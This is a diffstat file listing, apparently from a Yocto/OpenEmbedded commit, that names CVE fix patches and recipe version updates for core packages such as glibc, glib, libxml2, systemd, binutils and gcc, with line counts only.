-rw-r--r--meta/recipes-core/expat/expat/CVE-2022-25236.patch129
-rw-r--r--meta/recipes-core/expat/expat/CVE-2022-25313-regression.patch131
-rw-r--r--meta/recipes-core/expat/expat/CVE-2022-25313.patch230
-rw-r--r--meta/recipes-core/expat/expat/CVE-2022-25314.patch32
-rw-r--r--meta/recipes-core/expat/expat/CVE-2022-25315.patch145
-rw-r--r--meta/recipes-core/expat/expat/CVE-2022-40674.patch53
-rw-r--r--meta/recipes-core/expat/expat/CVE-2022-43680.patch33
-rw-r--r--meta/recipes-core/expat/expat/libtool-tag.patch41
-rw-r--r--meta/recipes-core/expat/expat_2.2.9.bb29
-rw-r--r--meta/recipes-core/fts/fts_1.2.7.bb3
-rw-r--r--meta/recipes-core/glib-2.0/glib-2.0/CVE-2020-35457.patch41
-rw-r--r--meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27218.patch129
-rw-r--r--meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-01.patch170
-rw-r--r--meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-02.patch249
-rw-r--r--meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-03.patch131
-rw-r--r--meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-04.patch298
-rw-r--r--meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-05.patch54
-rw-r--r--meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-06.patch101
-rw-r--r--meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-07.patch76
-rw-r--r--meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-08.patch101
-rw-r--r--meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-09.patch100
-rw-r--r--meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-10.patch59
-rw-r--r--meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-11.patch63
-rw-r--r--meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-reg1-1.patch36
-rw-r--r--meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-reg1-2.patch38
-rw-r--r--meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-reg1-4.patch38
-rw-r--r--meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-reg1-5.patch100
-rw-r--r--meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-reg2-1.patch49
-rw-r--r--meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-reg2-2.patch43
-rw-r--r--meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-reg2-3.patch232
-rw-r--r--meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-28153-1.patch27
-rw-r--r--meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-28153-2.patch42
-rw-r--r--meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-28153-3.patch57
-rw-r--r--meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-28153-4.patch265
-rw-r--r--meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-28153-5.patch55
-rw-r--r--meta/recipes-core/glib-2.0/glib-2.0/CVE-2023-29499.patch290
-rw-r--r--meta/recipes-core/glib-2.0/glib-2.0/CVE-2023-32611-0001.patch89
-rw-r--r--meta/recipes-core/glib-2.0/glib-2.0/CVE-2023-32611-0002.patch255
-rw-r--r--meta/recipes-core/glib-2.0/glib-2.0/CVE-2023-32636.patch49
-rw-r--r--meta/recipes-core/glib-2.0/glib-2.0/CVE-2023-32643.patch154
-rw-r--r--meta/recipes-core/glib-2.0/glib-2.0/CVE-2023-32665-0001.patch103
-rw-r--r--meta/recipes-core/glib-2.0/glib-2.0/CVE-2023-32665-0002.patch210
-rw-r--r--meta/recipes-core/glib-2.0/glib-2.0/CVE-2023-32665-0003.patch417
-rw-r--r--meta/recipes-core/glib-2.0/glib-2.0/CVE-2023-32665-0004.patch113
-rw-r--r--meta/recipes-core/glib-2.0/glib-2.0/CVE-2023-32665-0005.patch80
-rw-r--r--meta/recipes-core/glib-2.0/glib-2.0/CVE-2023-32665-0006.patch396
-rw-r--r--meta/recipes-core/glib-2.0/glib-2.0/CVE-2023-32665-0007.patch49
-rw-r--r--meta/recipes-core/glib-2.0/glib-2.0/CVE-2023-32665-0008.patch394
-rw-r--r--meta/recipes-core/glib-2.0/glib-2.0/CVE-2023-32665-0009.patch97
-rw-r--r--meta/recipes-core/glib-2.0/glib-2.0_2.62.6.bb39
-rw-r--r--meta/recipes-core/glib-2.0/glib.inc6
-rw-r--r--meta/recipes-core/glib-networking/glib-networking_2.62.4.bb2
-rw-r--r--meta/recipes-core/glibc/cross-localedef-native_2.31.bb2
-rw-r--r--meta/recipes-core/glibc/glibc-version.inc2
-rw-r--r--meta/recipes-core/glibc/glibc.inc4
-rw-r--r--meta/recipes-core/glibc/glibc/0030-elf-Refactor_dl_update-slotinfo-to-avoid-use-after-free.patch66
-rw-r--r--meta/recipes-core/glibc/glibc/0031-elf-Fix-data-races-in-pthread_create-and-TLS-access-BZ-19329.patch191
-rw-r--r--meta/recipes-core/glibc/glibc/0032-elf-Use-relaxed-atomics-for-racy-accesses-BZ-19329.patch206
-rw-r--r--meta/recipes-core/glibc/glibc/0033-elf-Add-test-case-for-BZ-19329.patch144
-rw-r--r--meta/recipes-core/glibc/glibc/0034-elf-Fix-DTV-gap-reuse-logic-BZ-27135.patch180
-rw-r--r--meta/recipes-core/glibc/glibc/0035-x86_64-Avoid-lazy-relocation-of-tlsdesc-BZ-27137.patch56
-rw-r--r--meta/recipes-core/glibc/glibc/0036-i386-Avoid-lazy-relocation-of-tlsdesc-BZ-27137.patch124
-rw-r--r--meta/recipes-core/glibc/glibc/0037-Avoid-deadlock-between-pthread_create-and-ctors.patch276
-rw-r--r--meta/recipes-core/glibc/glibc/CVE-2020-29573.patch128
-rw-r--r--meta/recipes-core/glibc/glibc/CVE-2021-33574_1.patch68
-rw-r--r--meta/recipes-core/glibc/glibc/CVE-2021-33574_2.patch73
-rw-r--r--meta/recipes-core/glibc/glibc/CVE-2021-38604.patch41
-rw-r--r--meta/recipes-core/glibc/glibc/CVE-2023-0687.patch82
-rw-r--r--meta/recipes-core/glibc/glibc/CVE-2023-4813.patch986
-rw-r--r--meta/recipes-core/glibc/glibc/CVE-2023-4911.patch63
-rw-r--r--meta/recipes-core/glibc/glibc/check-test-wrapper11
-rw-r--r--meta/recipes-core/glibc/glibc_2.31.bb50
-rw-r--r--meta/recipes-core/glibc/ldconfig-native-2.12.1/ldconfig.patch2
-rw-r--r--meta/recipes-core/ifupdown/files/0001-inet6.defn-Added-1-option-to-dhclient-on-upping-an-i.patch65
-rw-r--r--meta/recipes-core/ifupdown/ifupdown_0.8.35.bb4
-rw-r--r--meta/recipes-core/images/build-appliance-image_15.0.0.bb10
-rw-r--r--meta/recipes-core/initrdscripts/files/init-install-efi.sh5
-rwxr-xr-xmeta/recipes-core/initrdscripts/initramfs-framework/finish9
-rw-r--r--meta/recipes-core/initrdscripts/initramfs-framework/rootfs2
-rw-r--r--meta/recipes-core/initrdscripts/initramfs-framework/setup-live2
-rwxr-xr-xmeta/recipes-core/initscripts/initscripts-1.0/checkroot.sh2
-rw-r--r--meta/recipes-core/initscripts/initscripts_1.0.bb2
-rw-r--r--meta/recipes-core/kbd/kbd_2.2.0.bb1
-rw-r--r--meta/recipes-core/libxcrypt/libxcrypt.inc2
-rw-r--r--meta/recipes-core/libxml/libxml2/0001-Port-gentest.py-to-Python-3.patch813
-rw-r--r--meta/recipes-core/libxml/libxml2/CVE-2016-3709.patch89
-rw-r--r--meta/recipes-core/libxml/libxml2/CVE-2021-3516.patch35
-rw-r--r--meta/recipes-core/libxml/libxml2/CVE-2021-3517.patch53
-rw-r--r--meta/recipes-core/libxml/libxml2/CVE-2021-3518.patch112
-rw-r--r--meta/recipes-core/libxml/libxml2/CVE-2021-3537.patch50
-rw-r--r--meta/recipes-core/libxml/libxml2/CVE-2021-3541.patch73
-rw-r--r--meta/recipes-core/libxml/libxml2/CVE-2022-23308-fix-regression.patch98
-rw-r--r--meta/recipes-core/libxml/libxml2/CVE-2022-23308.patch204
-rw-r--r--meta/recipes-core/libxml/libxml2/CVE-2022-29824-dependent.patch53
-rw-r--r--meta/recipes-core/libxml/libxml2/CVE-2022-29824.patch348
-rw-r--r--meta/recipes-core/libxml/libxml2/CVE-2022-40303.patch623
-rw-r--r--meta/recipes-core/libxml/libxml2/CVE-2022-40304.patch104
-rw-r--r--meta/recipes-core/libxml/libxml2/CVE-2023-28484.patch79
-rw-r--r--meta/recipes-core/libxml/libxml2/CVE-2023-29469.patch42
-rw-r--r--meta/recipes-core/libxml/libxml2/CVE-2023-39615-0001.patch36
-rw-r--r--meta/recipes-core/libxml/libxml2/CVE-2023-39615-0002.patch71
-rw-r--r--meta/recipes-core/libxml/libxml2/CVE-2023-39615-pre.patch44
-rw-r--r--meta/recipes-core/libxml/libxml2/CVE-2023-45322-1.patch50
-rw-r--r--meta/recipes-core/libxml/libxml2/CVE-2023-45322-2.patch80
-rw-r--r--meta/recipes-core/libxml/libxml2/CVE-2024-25062-pre1.patch38
-rw-r--r--meta/recipes-core/libxml/libxml2/CVE-2024-25062.patch33
-rw-r--r--meta/recipes-core/libxml/libxml2/runtest.patch45
-rw-r--r--meta/recipes-core/libxml/libxml2_2.9.10.bb46
-rw-r--r--meta/recipes-core/meta/buildtools-extended-tarball.bb13
-rw-r--r--meta/recipes-core/meta/buildtools-tarball.bb2
-rw-r--r--meta/recipes-core/meta/cve-update-db-native.bb188
-rw-r--r--meta/recipes-core/meta/cve-update-nvd2-native.bb372
-rw-r--r--meta/recipes-core/musl/libucontext_git.bb2
-rw-r--r--meta/recipes-core/musl/musl-obstack.bb2
-rw-r--r--meta/recipes-core/musl/musl-utils.bb2
-rw-r--r--meta/recipes-core/musl/musl_git.bb2
-rw-r--r--meta/recipes-core/ncurses/files/0003-gen-pkgconfig.in-Do-not-include-LDFLAGS-in-generated.patch29
-rw-r--r--meta/recipes-core/ncurses/files/CVE-2021-39537.patch30
-rw-r--r--meta/recipes-core/ncurses/files/CVE-2022-29458.patch135
-rw-r--r--meta/recipes-core/ncurses/files/CVE-2023-29491.patch45
-rw-r--r--meta/recipes-core/ncurses/files/CVE-2023-50495.patch79
-rw-r--r--meta/recipes-core/ncurses/files/config.cache4
-rw-r--r--meta/recipes-core/ncurses/ncurses.inc12
-rw-r--r--meta/recipes-core/ncurses/ncurses_6.2.bb8
-rw-r--r--meta/recipes-core/os-release/os-release.bb4
-rw-r--r--meta/recipes-core/ovmf/ovmf-shell-image.bb1
-rw-r--r--meta/recipes-core/ovmf/ovmf/0001-Basetools-genffs-fix-gcc12-warning.patch49
-rw-r--r--meta/recipes-core/ovmf/ovmf/0001-Basetools-lzmaenc-fix-gcc12-warning.patch53
-rw-r--r--meta/recipes-core/ovmf/ovmf/0001-Basetools-turn-off-gcc12-warning.patch41
-rw-r--r--meta/recipes-core/ovmf/ovmf/0001-Fix-VLA-parameter-warning.patch51
-rw-r--r--meta/recipes-core/ovmf/ovmf/0001-ovmf-update-path-to-native-BaseTools.patch6
-rw-r--r--meta/recipes-core/ovmf/ovmf/0002-BaseTools-makefile-adjust-to-build-in-under-bitbake.patch32
-rw-r--r--meta/recipes-core/ovmf/ovmf/0003-ovmf-enable-long-path-file.patch6
-rw-r--r--meta/recipes-core/ovmf/ovmf/0004-ovmf-Update-to-latest.patch20
-rw-r--r--meta/recipes-core/ovmf/ovmf_git.bb16
-rw-r--r--meta/recipes-core/packagegroups/packagegroup-core-ssh-dropbear.bb1
-rw-r--r--meta/recipes-core/psplash/files/psplash-start.service1
-rw-r--r--meta/recipes-core/psplash/files/psplash-systemd.service1
-rw-r--r--meta/recipes-core/psplash/psplash_git.bb2
-rw-r--r--meta/recipes-core/systemd/systemd-boot_244.5.bb (renamed from meta/recipes-core/systemd/systemd-boot_244.3.bb)0
-rw-r--r--meta/recipes-core/systemd/systemd-conf/wired.network1
-rw-r--r--meta/recipes-core/systemd/systemd-conf_244.3.bb3
-rwxr-xr-xmeta/recipes-core/systemd/systemd-systemctl/systemctl22
-rw-r--r--meta/recipes-core/systemd/systemd.inc4
-rw-r--r--meta/recipes-core/systemd/systemd/00-create-volatile.conf1
-rw-r--r--meta/recipes-core/systemd/systemd/CVE-2018-21029.patch120
-rw-r--r--meta/recipes-core/systemd/systemd/CVE-2020-13529.patch42
-rw-r--r--meta/recipes-core/systemd/systemd/CVE-2020-13776.patch96
-rw-r--r--meta/recipes-core/systemd/systemd/CVE-2021-33910.patch67
-rw-r--r--meta/recipes-core/systemd/systemd/CVE-2021-3997-1.patch65
-rw-r--r--meta/recipes-core/systemd/systemd/CVE-2021-3997-2.patch101
-rw-r--r--meta/recipes-core/systemd/systemd/CVE-2021-3997-3.patch266
-rw-r--r--meta/recipes-core/systemd/systemd/CVE-2022-3821.patch47
-rw-r--r--meta/recipes-core/systemd/systemd/CVE-2023-26604-1.patch115
-rw-r--r--meta/recipes-core/systemd/systemd/CVE-2023-26604-2.patch264
-rw-r--r--meta/recipes-core/systemd/systemd/CVE-2023-26604-3.patch182
-rw-r--r--meta/recipes-core/systemd/systemd/CVE-2023-26604-4.patch32
-rw-r--r--meta/recipes-core/systemd/systemd/basic-pass-allocation-info-for-ordered-set-new-and-introd.patch78
-rw-r--r--meta/recipes-core/systemd/systemd/introduce-ordered_set_clear-free-with-destructor.patch35
-rw-r--r--meta/recipes-core/systemd/systemd/network-add-skeleton-of-request-queue.patch285
-rw-r--r--meta/recipes-core/systemd/systemd/network-also-drop-requests-when-link-enters-linger-state.patch50
-rw-r--r--meta/recipes-core/systemd/systemd/network-fix-Link-reference-counter-issue.patch278
-rw-r--r--meta/recipes-core/systemd/systemd/network-merge-link_drop-and-link_detach_from_manager.patch67
-rw-r--r--meta/recipes-core/systemd/systemd/rm-rf-optionally-fsync-after-removing-directory-tree.patch35
-rw-r--r--meta/recipes-core/systemd/systemd/rm-rf-refactor-rm-rf-children-split-out-body-of-directory.patch318
-rw-r--r--meta/recipes-core/systemd/systemd/systemd-pager.sh7
-rw-r--r--meta/recipes-core/systemd/systemd/systemd-udev-seclabel-options-crash-fix.patch30
-rw-r--r--meta/recipes-core/systemd/systemd_244.5.bb (renamed from meta/recipes-core/systemd/systemd_244.3.bb)40
-rwxr-xr-xmeta/recipes-core/sysvinit/sysvinit/rc2
-rw-r--r--meta/recipes-core/udev/eudev/init2
-rw-r--r--meta/recipes-core/udev/eudev_3.2.9.bb1
-rw-r--r--meta/recipes-core/update-rc.d/update-rc.d_0.8.bb4
-rw-r--r--meta/recipes-core/util-linux/util-linux.inc7
-rw-r--r--meta/recipes-core/util-linux/util-linux/CVE-2021-37600.patch33
-rw-r--r--meta/recipes-core/util-linux/util-linux/CVE-2021-3995.patch139
-rw-r--r--meta/recipes-core/util-linux/util-linux/CVE-2021-3996.patch226
-rw-r--r--meta/recipes-core/util-linux/util-linux/CVE-2022-0563.patch161
-rw-r--r--meta/recipes-core/util-linux/util-linux/include-strutils-cleanup-strto-functions.patch270
-rw-r--r--meta/recipes-core/util-linux/util-linux_2.35.1.bb5
-rw-r--r--meta/recipes-core/volatile-binds/files/volatile-binds.service.in2
-rw-r--r--meta/recipes-core/zlib/zlib/CVE-2018-25032.patch347
-rw-r--r--meta/recipes-core/zlib/zlib/CVE-2022-37434.patch44
-rw-r--r--meta/recipes-core/zlib/zlib/CVE-2023-45853.patch40
-rw-r--r--meta/recipes-core/zlib/zlib_1.2.11.bb6
-rw-r--r--meta/recipes-devtools/apt/apt.inc6
-rw-r--r--meta/recipes-devtools/apt/apt/CVE-2020-3810.patch174
-rw-r--r--meta/recipes-devtools/binutils/binutils-2.34.inc20
-rw-r--r--meta/recipes-devtools/binutils/binutils/0001-CVE-2021-45078.patch257
-rw-r--r--meta/recipes-devtools/binutils/binutils/0009-warn-for-uses-of-system-directories-when-cross-linki.patch26
-rw-r--r--meta/recipes-devtools/binutils/binutils/0018-Include-members-in-the-variable-table-used-when-reso.patch32
-rw-r--r--meta/recipes-devtools/binutils/binutils/CVE-2020-16592.patch61
-rw-r--r--meta/recipes-devtools/binutils/binutils/CVE-2020-16593.patch204
-rw-r--r--meta/recipes-devtools/binutils/binutils/CVE-2020-16598.patch32
-rw-r--r--meta/recipes-devtools/binutils/binutils/CVE-2021-20197.patch572
-rw-r--r--meta/recipes-devtools/binutils/binutils/CVE-2021-3487.patch83
-rw-r--r--meta/recipes-devtools/binutils/binutils/CVE-2021-3549.patch183
-rw-r--r--meta/recipes-devtools/binutils/binutils/CVE-2021-46174.patch35
-rw-r--r--meta/recipes-devtools/binutils/binutils/CVE-2022-38533.patch37
-rw-r--r--meta/recipes-devtools/binutils/binutils/CVE-2022-47007.patch32
-rw-r--r--meta/recipes-devtools/binutils/binutils/CVE-2022-47008.patch64
-rw-r--r--meta/recipes-devtools/binutils/binutils/CVE-2022-47010.patch34
-rw-r--r--meta/recipes-devtools/binutils/binutils/CVE-2022-47011.patch31
-rw-r--r--meta/recipes-devtools/binutils/binutils/CVE-2022-47695.patch57
-rw-r--r--meta/recipes-devtools/binutils/binutils/CVE-2022-48063.patch49
-rw-r--r--meta/recipes-devtools/binutils/binutils/CVE-2023-25584.patch530
-rw-r--r--meta/recipes-devtools/binutils/binutils/CVE-2023-25588.patch149
-rw-r--r--meta/recipes-devtools/bootchart2/bootchart2/0001-bootchartd.in-make-sure-only-one-bootchartd-process.patch68
-rw-r--r--meta/recipes-devtools/bootchart2/bootchart2_0.14.9.bb (renamed from meta/recipes-devtools/bootchart2/bootchart2_0.14.8.bb)8
-rw-r--r--meta/recipes-devtools/btrfs-tools/btrfs-tools_5.4.1.bb4
-rw-r--r--meta/recipes-devtools/build-compare/build-compare_git.bb2
-rw-r--r--meta/recipes-devtools/cdrtools/cdrtools-native_3.01.bb1
-rw-r--r--meta/recipes-devtools/cmake/cmake-native_3.16.5.bb1
-rw-r--r--meta/recipes-devtools/cmake/cmake/0006-cmake-FindGTest-Add-target-for-gmock-library.patch255
-rw-r--r--meta/recipes-devtools/cmake/cmake/OEToolchainConfig.cmake9
-rw-r--r--meta/recipes-devtools/createrepo-c/createrepo-c_0.15.7.bb2
-rw-r--r--meta/recipes-devtools/dejagnu/dejagnu_1.6.2.bb2
-rw-r--r--meta/recipes-devtools/desktop-file-utils/desktop-file-utils_0.24.bb3
-rw-r--r--meta/recipes-devtools/devel-config/distcc-config.bb1
-rw-r--r--meta/recipes-devtools/diffstat/diffstat_1.63.bb4
-rw-r--r--meta/recipes-devtools/distcc/distcc_3.3.3.bb3
-rw-r--r--meta/recipes-devtools/dmidecode/dmidecode/CVE-2023-30630-dependent_p1.patch236
-rw-r--r--meta/recipes-devtools/dmidecode/dmidecode/CVE-2023-30630-dependent_p2.patch198
-rw-r--r--meta/recipes-devtools/dmidecode/dmidecode/CVE-2023-30630.patch62
-rw-r--r--meta/recipes-devtools/dmidecode/dmidecode_3.2.bb4
-rw-r--r--meta/recipes-devtools/dnf/dnf/0040-Keep-installed-packages-in-upgrade-job-RhBug-1728252.patch60
-rw-r--r--meta/recipes-devtools/dnf/dnf_4.2.2.bb4
-rw-r--r--meta/recipes-devtools/dosfstools/dosfstools_4.1.bb2
-rw-r--r--meta/recipes-devtools/dpkg/dpkg.inc2
-rw-r--r--meta/recipes-devtools/dpkg/dpkg_1.19.8.bb (renamed from meta/recipes-devtools/dpkg/dpkg_1.19.7.bb)4
-rw-r--r--meta/recipes-devtools/dwarfsrcfiles/dwarfsrcfiles.bb1
-rw-r--r--meta/recipes-devtools/dwarfsrcfiles/files/dwarfsrcfiles.c13
-rw-r--r--meta/recipes-devtools/e2fsprogs/e2fsprogs.inc4
-rw-r--r--meta/recipes-devtools/e2fsprogs/e2fsprogs/0001-e2fsck-don-t-try-to-rehash-a-deleted-directory.patch49
-rw-r--r--meta/recipes-devtools/e2fsprogs/e2fsprogs/0001-misc-create_inode.c-set-dir-s-mode-correctly.patch41
-rw-r--r--meta/recipes-devtools/e2fsprogs/e2fsprogs/CVE-2019-5188.patch57
-rw-r--r--meta/recipes-devtools/e2fsprogs/e2fsprogs/CVE-2022-1304.patch42
-rw-r--r--meta/recipes-devtools/e2fsprogs/e2fsprogs/big-inodes-for-small-fs.patch22
-rw-r--r--meta/recipes-devtools/e2fsprogs/e2fsprogs/e2fsck-fix-use-after-free-in-calculate_tree.patch76
-rw-r--r--meta/recipes-devtools/e2fsprogs/e2fsprogs/e2fsprogs-fix-missing-check-for-permission-denied.patch2
-rw-r--r--meta/recipes-devtools/e2fsprogs/e2fsprogs/quiet-debugfs.patch2
-rw-r--r--meta/recipes-devtools/e2fsprogs/e2fsprogs/run-ptest1
-rw-r--r--meta/recipes-devtools/e2fsprogs/e2fsprogs_1.45.7.bb (renamed from meta/recipes-devtools/e2fsprogs/e2fsprogs_1.45.4.bb)18
-rw-r--r--meta/recipes-devtools/elfutils/elfutils_0.178.bb2
-rw-r--r--meta/recipes-devtools/elfutils/files/CVE-2021-33294.patch72
-rw-r--r--meta/recipes-devtools/fdisk/gptfdisk_1.0.4.bb1
-rw-r--r--meta/recipes-devtools/file/file_5.38.bb2
-rw-r--r--meta/recipes-devtools/flex/flex/0001-Emit-no-line-directives-if-gen_line_dirs-is-false.patch32
-rw-r--r--meta/recipes-devtools/flex/flex/check-funcs.patch67
-rw-r--r--meta/recipes-devtools/flex/flex_2.6.4.bb7
-rw-r--r--meta/recipes-devtools/gcc/gcc-9.3/0001-aarch64-New-Straight-Line-Speculation-SLS-mitigation.patch204
-rw-r--r--meta/recipes-devtools/gcc/gcc-9.3/0002-aarch64-Introduce-SLS-mitigation-for-RET-and-BR-inst.patch600
-rw-r--r--meta/recipes-devtools/gcc/gcc-9.3/0003-aarch64-Mitigate-SLS-for-BLR-instruction.patch659
-rw-r--r--meta/recipes-devtools/gcc/gcc-9.5.inc (renamed from meta/recipes-devtools/gcc/gcc-9.3.inc)18
-rw-r--r--meta/recipes-devtools/gcc/gcc-9.5/0001-gcc-4.3.1-ARCH_FLAGS_FOR_TARGET.patch (renamed from meta/recipes-devtools/gcc/gcc-9.3/0001-gcc-4.3.1-ARCH_FLAGS_FOR_TARGET.patch)0
-rw-r--r--meta/recipes-devtools/gcc/gcc-9.5/0002-gcc-poison-system-directories.patch (renamed from meta/recipes-devtools/gcc/gcc-9.3/0002-gcc-poison-system-directories.patch)0
-rw-r--r--meta/recipes-devtools/gcc/gcc-9.5/0002-libstdc-Fix-inconsistent-noexcept-specific-for-valar.patch44
-rw-r--r--meta/recipes-devtools/gcc/gcc-9.5/0003-gcc-4.3.3-SYSROOT_CFLAGS_FOR_TARGET.patch (renamed from meta/recipes-devtools/gcc/gcc-9.3/0003-gcc-4.3.3-SYSROOT_CFLAGS_FOR_TARGET.patch)0
-rw-r--r--meta/recipes-devtools/gcc/gcc-9.5/0004-64-bit-multilib-hack.patch (renamed from meta/recipes-devtools/gcc/gcc-9.3/0004-64-bit-multilib-hack.patch)0
-rw-r--r--meta/recipes-devtools/gcc/gcc-9.5/0005-optional-libstdc.patch (renamed from meta/recipes-devtools/gcc/gcc-9.3/0005-optional-libstdc.patch)0
-rw-r--r--meta/recipes-devtools/gcc/gcc-9.5/0006-COLLECT_GCC_OPTIONS.patch (renamed from meta/recipes-devtools/gcc/gcc-9.3/0006-COLLECT_GCC_OPTIONS.patch)0
-rw-r--r--meta/recipes-devtools/gcc/gcc-9.5/0007-Use-the-defaults.h-in-B-instead-of-S-and-t-oe-in-B.patch (renamed from meta/recipes-devtools/gcc/gcc-9.3/0007-Use-the-defaults.h-in-B-instead-of-S-and-t-oe-in-B.patch)0
-rw-r--r--meta/recipes-devtools/gcc/gcc-9.5/0008-fortran-cross-compile-hack.patch (renamed from meta/recipes-devtools/gcc/gcc-9.3/0008-fortran-cross-compile-hack.patch)0
-rw-r--r--meta/recipes-devtools/gcc/gcc-9.5/0009-cpp-honor-sysroot.patch (renamed from meta/recipes-devtools/gcc/gcc-9.3/0009-cpp-honor-sysroot.patch)0
-rw-r--r--meta/recipes-devtools/gcc/gcc-9.5/0010-MIPS64-Default-to-N64-ABI.patch (renamed from meta/recipes-devtools/gcc/gcc-9.3/0010-MIPS64-Default-to-N64-ABI.patch)0
-rw-r--r--meta/recipes-devtools/gcc/gcc-9.5/0011-Define-GLIBC_DYNAMIC_LINKER-and-UCLIBC_DYNAMIC_LINKE.patch (renamed from meta/recipes-devtools/gcc/gcc-9.3/0011-Define-GLIBC_DYNAMIC_LINKER-and-UCLIBC_DYNAMIC_LINKE.patch)0
-rw-r--r--meta/recipes-devtools/gcc/gcc-9.5/0012-gcc-Fix-argument-list-too-long-error.patch (renamed from meta/recipes-devtools/gcc/gcc-9.3/0012-gcc-Fix-argument-list-too-long-error.patch)6
-rw-r--r--meta/recipes-devtools/gcc/gcc-9.5/0013-Disable-sdt.patch (renamed from meta/recipes-devtools/gcc/gcc-9.3/0013-Disable-sdt.patch)0
-rw-r--r--meta/recipes-devtools/gcc/gcc-9.5/0014-libtool.patch (renamed from meta/recipes-devtools/gcc/gcc-9.3/0014-libtool.patch)0
-rw-r--r--meta/recipes-devtools/gcc/gcc-9.5/0015-gcc-armv4-pass-fix-v4bx-to-linker-to-support-EABI.patch (renamed from meta/recipes-devtools/gcc/gcc-9.3/0015-gcc-armv4-pass-fix-v4bx-to-linker-to-support-EABI.patch)0
-rw-r--r--meta/recipes-devtools/gcc/gcc-9.5/0016-Use-the-multilib-config-files-from-B-instead-of-usin.patch (renamed from meta/recipes-devtools/gcc/gcc-9.3/0016-Use-the-multilib-config-files-from-B-instead-of-usin.patch)0
-rw-r--r--meta/recipes-devtools/gcc/gcc-9.5/0017-Avoid-using-libdir-from-.la-which-usually-points-to-.patch (renamed from meta/recipes-devtools/gcc/gcc-9.3/0017-Avoid-using-libdir-from-.la-which-usually-points-to-.patch)0
-rw-r--r--meta/recipes-devtools/gcc/gcc-9.5/0018-export-CPP.patch (renamed from meta/recipes-devtools/gcc/gcc-9.3/0018-export-CPP.patch)0
-rw-r--r--meta/recipes-devtools/gcc/gcc-9.5/0019-Ensure-target-gcc-headers-can-be-included.patch (renamed from meta/recipes-devtools/gcc/gcc-9.3/0019-Ensure-target-gcc-headers-can-be-included.patch)0
-rw-r--r--meta/recipes-devtools/gcc/gcc-9.5/0020-gcc-4.8-won-t-build-with-disable-dependency-tracking.patch (renamed from meta/recipes-devtools/gcc/gcc-9.3/0020-gcc-4.8-won-t-build-with-disable-dependency-tracking.patch)0
-rw-r--r--meta/recipes-devtools/gcc/gcc-9.5/0021-Don-t-search-host-directory-during-relink-if-inst_pr.patch (renamed from meta/recipes-devtools/gcc/gcc-9.3/0021-Don-t-search-host-directory-during-relink-if-inst_pr.patch)0
-rw-r--r--meta/recipes-devtools/gcc/gcc-9.5/0022-Use-SYSTEMLIBS_DIR-replacement-instead-of-hardcoding.patch (renamed from meta/recipes-devtools/gcc/gcc-9.3/0022-Use-SYSTEMLIBS_DIR-replacement-instead-of-hardcoding.patch)0
-rw-r--r--meta/recipes-devtools/gcc/gcc-9.5/0023-aarch64-Add-support-for-musl-ldso.patch (renamed from meta/recipes-devtools/gcc/gcc-9.3/0023-aarch64-Add-support-for-musl-ldso.patch)0
-rw-r--r--meta/recipes-devtools/gcc/gcc-9.5/0024-libcc1-fix-libcc1-s-install-path-and-rpath.patch (renamed from meta/recipes-devtools/gcc/gcc-9.3/0024-libcc1-fix-libcc1-s-install-path-and-rpath.patch)0
-rw-r--r--meta/recipes-devtools/gcc/gcc-9.5/0025-handle-sysroot-support-for-nativesdk-gcc.patch (renamed from meta/recipes-devtools/gcc/gcc-9.3/0025-handle-sysroot-support-for-nativesdk-gcc.patch)0
-rw-r--r--meta/recipes-devtools/gcc/gcc-9.5/0026-Search-target-sysroot-gcc-version-specific-dirs-with.patch (renamed from meta/recipes-devtools/gcc/gcc-9.3/0026-Search-target-sysroot-gcc-version-specific-dirs-with.patch)0
-rw-r--r--meta/recipes-devtools/gcc/gcc-9.5/0027-Fix-various-_FOR_BUILD-and-related-variables.patch (renamed from meta/recipes-devtools/gcc/gcc-9.3/0027-Fix-various-_FOR_BUILD-and-related-variables.patch)0
-rw-r--r--meta/recipes-devtools/gcc/gcc-9.5/0028-nios2-Define-MUSL_DYNAMIC_LINKER.patch (renamed from meta/recipes-devtools/gcc/gcc-9.3/0028-nios2-Define-MUSL_DYNAMIC_LINKER.patch)0
-rw-r--r--meta/recipes-devtools/gcc/gcc-9.5/0029-Add-ssp_nonshared-to-link-commandline-for-musl-targe.patch (renamed from meta/recipes-devtools/gcc/gcc-9.3/0029-Add-ssp_nonshared-to-link-commandline-for-musl-targe.patch)0
-rw-r--r--meta/recipes-devtools/gcc/gcc-9.5/0030-ldbl128-config.patch (renamed from meta/recipes-devtools/gcc/gcc-9.3/0030-ldbl128-config.patch)0
-rw-r--r--meta/recipes-devtools/gcc/gcc-9.5/0031-Link-libgcc-using-LDFLAGS-not-just-SHLIB_LDFLAGS.patch (renamed from meta/recipes-devtools/gcc/gcc-9.3/0031-Link-libgcc-using-LDFLAGS-not-just-SHLIB_LDFLAGS.patch)0
-rw-r--r--meta/recipes-devtools/gcc/gcc-9.5/0032-libgcc_s-Use-alias-for-__cpu_indicator_init-instead-.patch (renamed from meta/recipes-devtools/gcc/gcc-9.3/0032-libgcc_s-Use-alias-for-__cpu_indicator_init-instead-.patch)0
-rw-r--r--meta/recipes-devtools/gcc/gcc-9.5/0033-sync-gcc-stddef.h-with-musl.patch (renamed from meta/recipes-devtools/gcc/gcc-9.3/0033-sync-gcc-stddef.h-with-musl.patch)0
